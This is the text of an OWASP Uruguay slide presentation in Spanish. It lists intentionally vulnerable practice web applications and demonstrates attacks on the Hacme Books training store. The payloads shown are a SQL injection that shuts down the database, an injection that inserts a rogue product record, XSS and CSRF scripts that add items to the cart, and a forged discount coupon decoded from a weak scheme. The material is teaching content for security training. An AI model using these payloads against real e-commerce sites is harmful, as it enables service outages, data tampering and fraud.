de Hacking a un eCommerce Ejemplos Prácticos de Hacking a un eCommerce Mateo Martínez, QSA, CISSP OWASP URUGUAY
OWASP Vulnerable Web Applications Directory Project Get out of Jail! Offline Virtual Machines (VMs) or ISO images Online/Live Offline: The following list references downloadable vulnerable web applications to play with that can be installed on a standard operating system (Linux, Windows, Mac OS X, etc) using a standard web platform (Apache/PHP, Tomcat/Java, IIS/.NET, etc). The BodgeIt Store (Java): http://code.google.com/p/bodgeit/ (download) OWASP Bricks (PHP): http://sechow.com/bricks/index.html (download & docs) The ButterFly Security Project (PHP): http://sourceforge.net/projects/thebutterflytmp/ (download) bWAPP - an extremely buggy web application! (PHP): http://www.itsecgames.com (download) (docs) Damn Vulnerable Web Application - DVWA (PHP): http://www.dvwa.co.uk (download) Damn Vulnerable Web Services - DVWS (PHP): http://dvws.secureideas.net (download) OWASP Hackademic Challenges Project (PHP):https://www.owasp.org/index.php/OWASP_Hackademic_Challenges_Project (download) Google Gruyere (Python): http://google-gruyere.appspot.com (download) Hacme Bank (.NET): http://www.mcafee.com/us/downloads/free-tools/hacme-bank.aspx (download) Hacme Books (Java): http://www.mcafee.com/us/downloads/free-tools/hacmebooks.aspx (download) Hacme Casino (Ruby on Rails): http://www.mcafee.com/us/downloads/free-tools/hacme-casino.aspx(download) Hacme Shipping (ColdFusion): http://www.mcafee.com/us/downloads/free-tools/hacmeshipping.aspx (download) Hacme Travel (C++): http://www.mcafee.com/us/downloads/free-tools/hacmetravel.aspx (download) OWASP Insecure Web App Project (Java):https://www.owasp.org/index.php/Category:OWASP_Insecure_Web_App_Project (download -orphaned) Mutillidae (PHP): http://www.irongeek.com/i.php?page=mutillidae/mutillidae-deliberately-vulnerable-php-owasp-top-10 (download) OWASP .NET Goat (C#): https://owasp.codeplex.com (download) Peruggia (PHP): http://peruggia.sourceforge.net (download) Puzzlemall (Java): https://code.google.com/p/puzzlemall/ (download) (docs) Stanford Securibench (Java) & Micro: http://suif.stanford.edu/~livshits/securibench/ (download) SQLI-labs (PHP): https://github.com/Audi-1/sqli-labs (download) (blog) SQLol (PHP): https://github.com/SpiderLabs/SQLol (download) OWASP Vicnum Project (Perl & PHP):https://www.owasp.org/index.php/Category:OWASP_Vicnum_Project (download) VulnApp (.NET): http://www.nth-dimension.org.uk/blog.php?id=88 (CVS download & vulns) WackoPicko (PHP): https://github.com/adamdoupe/WackoPicko (download) (whitepaper) OWASP WebGoat (Java): https://www.owasp.org/index.php/Category:OWASP_WebGoat_Project(download) (guide) OWASP ZAP WAVE - Web Application Vulnerability Examples (Java):http://code.google.com/p/zaproxy/downloads/list Wavsep - Web Application Vulnerability Scanner Evaluation Project (Java): https://code.google.com/p/wavsep/ (download) (docs) WIVET - Web Input Vector Extractor Teaser: https://code.google.com/p/wivet/ (download) (tests) Virtual Machines (VMs) or ISO images: The following list references preinstalled and ready to use virtual machines (VMs) or ISO images that contain one or multiple vulnerable web applications to play with. BadStore (ISO): http://www.badstore.net (download - registration required) Bee-Box (bWAPP VMware): http://sourceforge.net/projects/bwapp/files/bee-box/ OWASP BWA - Broken Web Applications Project (VMware - list):https://www.owasp.org/index.php/OWASP_Broken_Web_Applications_Project (download) Drunk Admin Web Hacking Challenge (VMware): https://bechtsoudis.com/work-stuff/challenges/drunk-admin-web-hacking-challenge/ (download) Exploit.co.il Vuln Web App (VMware): http://exploit.co.il/projects/vuln-web-app/ (download) GameOver (VMware): http://sourceforge.net/projects/null-gameover/ (download) Hackxor (VMware): http://hackxor.sourceforge.net/cgi-bin/index.pl (download) (hints&tips) Hacme Bank Prebuilt VM (VMware): http://ninja-sec.com/index.php/hacme-bank-prebuilt-vmware-image-ninja-sec-com/ (download) Kioptrix4 (VMware & Hyper-V): http://www.kioptrix.com/blog/?p=604 (download) LAMPSecurity (VMware): http://sourceforge.net/projects/lampsecurity/ (download) (doc) Metasploitable (VMware): http://blog.metasploit.com/2010/05/introducing-metasploitable.html(download - torrent) (doc) Metasploitable 2 (VMware): https://community.rapid7.com/docs/DOC-1875 (download) Moth (VMware): http://www.bonsai-sec.com/en/research/moth.php (download) PentesterLab - The Exercises (ISO & PDF): https://www.pentesterlab.com/exercises/ PHDays I-Bank (VMware): http://phdays.blogspot.com.es/2012/05/once-again-about-remote-banking.html (download) Samurai WTF (ISO - list): http://www.samurai-wtf.org (download) Sauron (Quemu) [Spanish]: http://sg6-labs.blogspot.com/2007/12/secgame-1-sauron.html (solutions) UltimateLAMP (VMware - list): http://ronaldbradford.com/blog/ultimatelamp-2006-05-19/ (download) Virtual Hacking Lab (ZIP): http://sourceforge.net/projects/virtualhacking/ (download) Web Security Dojo (VMware, VirtualBox - list): http://www.mavensecurity.com/web_security_dojo/(download) Online/Live: The following list references online and live vulnerable web applications available on the Internet to play with. Acunetix: http://testasp.vulnweb.com (Forum - ASP) http://testaspnet.vulnweb.com (Blog - .NET) http://testphp.vulnweb.com (Art shopping - PHP) Cenzic CrackMeBank: http://crackme.cenzic.com Google Gruyere (Python): http://google-gruyere.appspot.com/start Hacking-Lab (eg. OWASP Top 10): https://www.hacking-lab.com/events/registerform.html?eventid=245 Hack.me (beta): https://hack.me HackThisSite (HTS - Basic & Realistic (web) Missions): http://www.hackthissite.org Hackxor online demo: http://hackxor.sourceforge.net/cgi-bin/index.pl#demo (algo/smurf) HP/SpiDynamics Free Bank Online: http://zero.webappsecurity.com (admin/admin) IBM/Watchfire AltoroMutual: http://demo.testfire.net (jsmith/Demo1234) NTOSpider Web Scanner Test Site: http://www.webscantest.com (testuser/testpass) OWASP Hackademic Challenges Project - Live (PHP - Joomla): http://hackademic1.teilar.gr Pentester Academy: http://pentesteracademylab.appspot.com http://goo.gl/84NfEv
HackPack v1.0 Hacme Bank - Android v1.0 Hacme Bank v2.0 Hacme Books Hacme Casino v1.0 Hacme Shipping Hacme Travel Hacme Bank™ Android is designed to teach mobile application developers, programmers, architects and security professionals how to create secure software and evaluate their own software to identify vulnerabilities. Hacme Bank™ is designed to teach application developers, programmers, architects and security professionals how to create secure software. Foundstone Hacme Books is a learning platform for secure software developmentFoundstone Hacme Casino™ is a learning platform for secure software development. Hacme Shipping is a web-based shipping application developed to demonstrate common web application hacking techniques. Hacme Travel is designed to create secure software.
#1 Generación de Errores
“ ’ ”
stack trace
“ ’ ” • Tipo de BD – Hypersonic SQL (org.hsqldb) • Servidor de Aplicación – Apache Tomcat • Utiliza Spring framework • Aplicación J2EE application – Java namespaces
#2 Inyección SQL (a)
Comando para hacer un halt al servidor de BD en HSQLDB : SHUTDOWN
Comando para hacer un halt al servidor de BD en HSQLDB : SHUTDOWN
select * from products where title like '%texto_del_usuario%' and like '%otro_texto_del_usuario%'
select * from products where title like '%'; SHUTDOWN; --%' and like '%otro_texto_del_usuario%'
#2 Inyección SQL (b)
my feedback', 735); insert into products (title, description, popularity, price, vendor, category, publisher, isbn, author, imgurl, quantity) values ('Eat my shorts you pointy haired boss','A great book',4,29.95,'Amazon','Technical','Addison Wesley','1234567890123','Disgruntled Employee','http://',1); --
#3 XSS (Cross-Site Scripting)
<script>alert("XSS")</script>
You should buy our latest bestseller instead of this book. <script> location="http://localhost:8989/HacmeBooks/addShoppingCart.html?productId=1470" </script>
#4 CSRF (Cross-Site Request Forgery)
You should really consider purchasing the latest bestseller. <img src=http://localhost:8989/HacmeBooks/addShoppingCart.html?productId=1470 height="1"/>
#5 Crypto
15 % de Descuento AEODBOBOOF 25% de Descuento BEAAABBOOF BEOABDBOOF
AEODBOBOOF BEAAABBOOF BEOABDBOOF 2511122006 2501242006 BEAAAB2006 BEOABD2006
Probar este cupón: IEODBOBOAD % Mes Día Año 15 04 20 2006 25 11 12 2006 95 04 20 2014 IE OD BO BOAD Probar este cupón: IEODBOBOAD
#6 Broken Access Control
Hacme Books http://sourceforge.net/projects/foundstone
¡Muchas gracias! mateo.martinez@owasp.org